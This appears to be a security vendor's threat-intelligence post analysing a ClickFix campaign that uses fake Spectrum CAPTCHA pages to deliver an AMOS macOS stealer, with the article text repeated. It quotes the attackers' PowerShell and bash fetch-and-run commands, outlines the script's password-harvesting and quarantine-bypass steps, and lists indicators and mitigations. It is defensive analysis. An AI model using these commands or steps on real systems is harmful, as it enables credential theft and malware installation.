AMOS Variant Distributed Via Clickfix In Spectrum-Themed Dynamic Delivery Campaign By Russian Speaking Hackers

CloudSEK researchers have uncovered a sophisticated campaign leveraging typo-squatted “Spectrum” domains to spread a new Atomic macOS Stealer (AMOS) variant. Disguised as a CAPTCHA verification, the attack uses dynamic payloads tailored to the victim's OS—stealing passwords, bypassing macOS security, and executing malware. With Russian-language comments found in the code and flawed delivery logic, the campaign reflects both growing cross-platform ambitions and rushed execution. Dive into how this multi-platform threat operates—and why your organization should stay alert.

Koushik Pal
June 4, 2025
Green Alert
Last Update posted on
June 5, 2025
Proactive Monitoring of the Dark Web for your organization.

Proactively monitor and defend your organization against threats from the dark web with CloudSEK XVigil.

Schedule a Demo
Table of Contents
Author(s)
No items found.

Executive Summary

A new Atomic macOS Stealer (AMOS) variant campaign has been uncovered, leveraging typo-squatted domains mimicking Spectrum, a U.S.-based telecom provider. The campaign employs the Clickfix method and delivers different payloads based on the victim's operating system. Notably, macOS users are served a malicious shell script designed to steal system passwords and download an AMOS variant for further exploitation. The script uses native macOS commands to harvest credentials, bypass security mechanisms, and execute malicious binaries. Russian-language comments in the source code suggest involvement of Russian-speaking cybercriminals. Poorly implemented logic in the delivery sites, such as mismatched instructions across platforms, points to hastily assembled infrastructure. This campaign highlights an increasing trend in multi-platform social engineering attacks targeting both consumer and corporate users.

Analysis 

During the routine attacker infrastructure discovery and attribution cycle, we discovered a number of Clickfix themed delivery websites found to be typoquatting Spectrum, a US based company providing services for cable television, internet access, internet security, managed services, mobile phone, and unified communications.

When the victim clicks on “Alternative Verification”, a command is copied to the clipboard, and instructions are displayed for the victim to follow. Just like any other Clickfix campaign.

However, upon investigating further, we discovered that the website returned different responses based on varying user-agents.

Clipboard - Non macOS useragent

powershell -NoProfile -ExecutionPolicy Bypass -Command "$file = [System.IO.Path]::Combine($env:TEMP, 'api.ps1'); Invoke-WebRequest -Uri 'https://cf-verifi[.]pages[.]dev/i.txt' -OutFile $file; & $file" # ㅤCloudflareㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤ

This is one of the most commonly used delivery methods for Windows users.

Clipboard - macOS useragent

/bin/bash -c "$(curl -fsSL https://applemacios[.]com/getrur/install.sh)" # MacOS Verification #248187 authenticated by Cloudflare. Copyright Cloudflare 2025.

/bin/bash -c "...": This tells the system to run the command inside the quotes using the Bash shell.

curl -fsSL <URL>:

  • -f: Fail silently on HTTP errors.
  • -s: Silent mode (no progress output).
  • -S: Show error if -s is used and the request fails.
  • -L: Follow redirects.
  • It downloads the contents of the script hosted at https://applemacios[.]com/getrur/install.sh.

The output of curl (i.e., the install.sh script) is executed immediately by Bash.

Contents of install.sh

Password Harvesting:

  1. Gets Current User: username=$(whoami)
  2. Password Prompt Loop: Continuously prompts "System Password:" until correct password entered
  3. Password Validation: Uses dscl . -authonly to verify the password against macOS directory services
  4. Password Storage: Saves the valid password to /tmp/.pass file

Download & Execution:

  1. Downloads Payload: curl -o /tmp/update https://applemacios[.]com/getrur/update
  2. Removes Quarantine: Uses stolen password with sudo -S xattr -c to bypass macOS security
  3. Makes Executable: chmod +x /tmp/update
  4. Executes Malware: Runs the downloaded file /tmp/update

Upon analyzing the file saved as “update” within the “tmp” directory, we discovered that the malware belongs to the Atomic macOS stealer (AMOS) family. AMOS variants such as Poseidon and Odyssey has been seen in the wild lately, gaining traction among cybercriminals.

Attribution

While inspecting the source code of the delivery page, we came across a couple of comments in Russian, indicating that the malware is likely being spread by Russian speaking cybercriminals. Using these comments as a pivot point, along with other HTTP parameters, we were able to find IOFAs in addition to the IOCs.

The delivery pages in question for this AMOS variant campaign contained inaccuracies in both its programming and front-end logic. For Linux user agents, a PowerShell command was copied. Furthermore, the instruction "Press & hold the Windows Key + R" was displayed to both Windows and Mac users.

IOCs & IOFAs

Indicator Type Value Use
Domain panel-spectrum[.]net Clickfix Delivery
Domain spectrum-ticket[.]net Clickfix Delivery
Domain cf-verifi.pages[.]dev Command and Control
Domain applemacios[.]com Command and Control
MD5 Hash eaedee8fc9fe336bcde021bf243e332a AMOS Variant
URL https://cf-verifi.pages[.]dev/i.txt Contacted URLs
URL https://applemacios[.]com/getrur/install.sh Contacted URLs
URL https://applemacios[.]com/getrur/update Contacted URLs
Domain rugme[.]cat Clickfix Indicator of future attack

Impact

  • Corporate Credential Compromise: By harvesting macOS user passwords, attackers can gain access to corporate systems, VPNs, and internal resources, potentially enabling lateral movement.
  • Bypass of Endpoint Security Controls: The malware uses legitimate utilities (dscl, sudo, xattr) to bypass macOS security mechanisms, reducing the chance of detection by traditional antivirus or EDR solutions.
  • Initial Access for Broader Intrusions: Stolen credentials and persistent access may be sold to access brokers or used for follow-on attacks such as ransomware or data exfiltration.

Mitigations

  • User Awareness Training: Educate employees and users about password-stealing tactics, especially those disguised as system verification prompts.
  • macOS Endpoint Hardening: Enforce system integrity protections and restrict execution of unsigned scripts using tools like Gatekeeper and MDM policies.
  • Threat Hunting for AMOS Activity: Monitor logs and endpoints for signs of password prompt abuse, unusual sudo activity, and known AMOS indicators.

References

Predict Cyber threats against your organization

Related Posts
No items found.

Join 10,000+ subscribers

Keep up with the latest news about strains of Malware, Phishing Lures,
Indicators of Compromise, and Data Leaks.

Take action now

Secure your organisation with our Award winning Products

CloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities.

Adversary Intelligence

7

min read

AMOS Variant Distributed Via Clickfix In Spectrum-Themed Dynamic Delivery Campaign By Russian Speaking Hackers

CloudSEK researchers have uncovered a sophisticated campaign leveraging typo-squatted “Spectrum” domains to spread a new Atomic macOS Stealer (AMOS) variant. Disguised as a CAPTCHA verification, the attack uses dynamic payloads tailored to the victim's OS—stealing passwords, bypassing macOS security, and executing malware. With Russian-language comments found in the code and flawed delivery logic, the campaign reflects both growing cross-platform ambitions and rushed execution. Dive into how this multi-platform threat operates—and why your organization should stay alert.

Authors
Koushik Pal
Co-Authors
No items found.

Executive Summary

A new Atomic macOS Stealer (AMOS) variant campaign has been uncovered, leveraging typo-squatted domains mimicking Spectrum, a U.S.-based telecom provider. The campaign employs the Clickfix method and delivers different payloads based on the victim's operating system. Notably, macOS users are served a malicious shell script designed to steal system passwords and download an AMOS variant for further exploitation. The script uses native macOS commands to harvest credentials, bypass security mechanisms, and execute malicious binaries. Russian-language comments in the source code suggest involvement of Russian-speaking cybercriminals. Poorly implemented logic in the delivery sites, such as mismatched instructions across platforms, points to hastily assembled infrastructure. This campaign highlights an increasing trend in multi-platform social engineering attacks targeting both consumer and corporate users.

Analysis 

During the routine attacker infrastructure discovery and attribution cycle, we discovered a number of Clickfix themed delivery websites found to be typoquatting Spectrum, a US based company providing services for cable television, internet access, internet security, managed services, mobile phone, and unified communications.

When the victim clicks on “Alternative Verification”, a command is copied to the clipboard, and instructions are displayed for the victim to follow. Just like any other Clickfix campaign.

However, upon investigating further, we discovered that the website returned different responses based on varying user-agents.

Clipboard - Non macOS useragent

powershell -NoProfile -ExecutionPolicy Bypass -Command "$file = [System.IO.Path]::Combine($env:TEMP, 'api.ps1'); Invoke-WebRequest -Uri 'https://cf-verifi[.]pages[.]dev/i.txt' -OutFile $file; & $file" # ㅤCloudflareㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤ

This is one of the most commonly used delivery methods for Windows users.

Clipboard - macOS useragent

/bin/bash -c "$(curl -fsSL https://applemacios[.]com/getrur/install.sh)" # MacOS Verification #248187 authenticated by Cloudflare. Copyright Cloudflare 2025.

/bin/bash -c "...": This tells the system to run the command inside the quotes using the Bash shell.

curl -fsSL <URL>:

  • -f: Fail silently on HTTP errors.
  • -s: Silent mode (no progress output).
  • -S: Show error if -s is used and the request fails.
  • -L: Follow redirects.
  • It downloads the contents of the script hosted at https://applemacios[.]com/getrur/install.sh.

The output of curl (i.e., the install.sh script) is executed immediately by Bash.

Contents of install.sh

Password Harvesting:

  1. Gets Current User: username=$(whoami)
  2. Password Prompt Loop: Continuously prompts "System Password:" until correct password entered
  3. Password Validation: Uses dscl . -authonly to verify the password against macOS directory services
  4. Password Storage: Saves the valid password to /tmp/.pass file

Download & Execution:

  1. Downloads Payload: curl -o /tmp/update https://applemacios[.]com/getrur/update
  2. Removes Quarantine: Uses stolen password with sudo -S xattr -c to bypass macOS security
  3. Makes Executable: chmod +x /tmp/update
  4. Executes Malware: Runs the downloaded file /tmp/update

Upon analyzing the file saved as “update” within the “tmp” directory, we discovered that the malware belongs to the Atomic macOS stealer (AMOS) family. AMOS variants such as Poseidon and Odyssey has been seen in the wild lately, gaining traction among cybercriminals.

Attribution

While inspecting the source code of the delivery page, we came across a couple of comments in Russian, indicating that the malware is likely being spread by Russian speaking cybercriminals. Using these comments as a pivot point, along with other HTTP parameters, we were able to find IOFAs in addition to the IOCs.

The delivery pages in question for this AMOS variant campaign contained inaccuracies in both its programming and front-end logic. For Linux user agents, a PowerShell command was copied. Furthermore, the instruction "Press & hold the Windows Key + R" was displayed to both Windows and Mac users.

IOCs & IOFAs

Indicator Type Value Use
Domain panel-spectrum[.]net Clickfix Delivery
Domain spectrum-ticket[.]net Clickfix Delivery
Domain cf-verifi.pages[.]dev Command and Control
Domain applemacios[.]com Command and Control
MD5 Hash eaedee8fc9fe336bcde021bf243e332a AMOS Variant
URL https://cf-verifi.pages[.]dev/i.txt Contacted URLs
URL https://applemacios[.]com/getrur/install.sh Contacted URLs
URL https://applemacios[.]com/getrur/update Contacted URLs
Domain rugme[.]cat Clickfix Indicator of future attack

Impact

  • Corporate Credential Compromise: By harvesting macOS user passwords, attackers can gain access to corporate systems, VPNs, and internal resources, potentially enabling lateral movement.
  • Bypass of Endpoint Security Controls: The malware uses legitimate utilities (dscl, sudo, xattr) to bypass macOS security mechanisms, reducing the chance of detection by traditional antivirus or EDR solutions.
  • Initial Access for Broader Intrusions: Stolen credentials and persistent access may be sold to access brokers or used for follow-on attacks such as ransomware or data exfiltration.

Mitigations

  • User Awareness Training: Educate employees and users about password-stealing tactics, especially those disguised as system verification prompts.
  • macOS Endpoint Hardening: Enforce system integrity protections and restrict execution of unsigned scripts using tools like Gatekeeper and MDM policies.
  • Threat Hunting for AMOS Activity: Monitor logs and endpoints for signs of password prompt abuse, unusual sudo activity, and known AMOS indicators.

References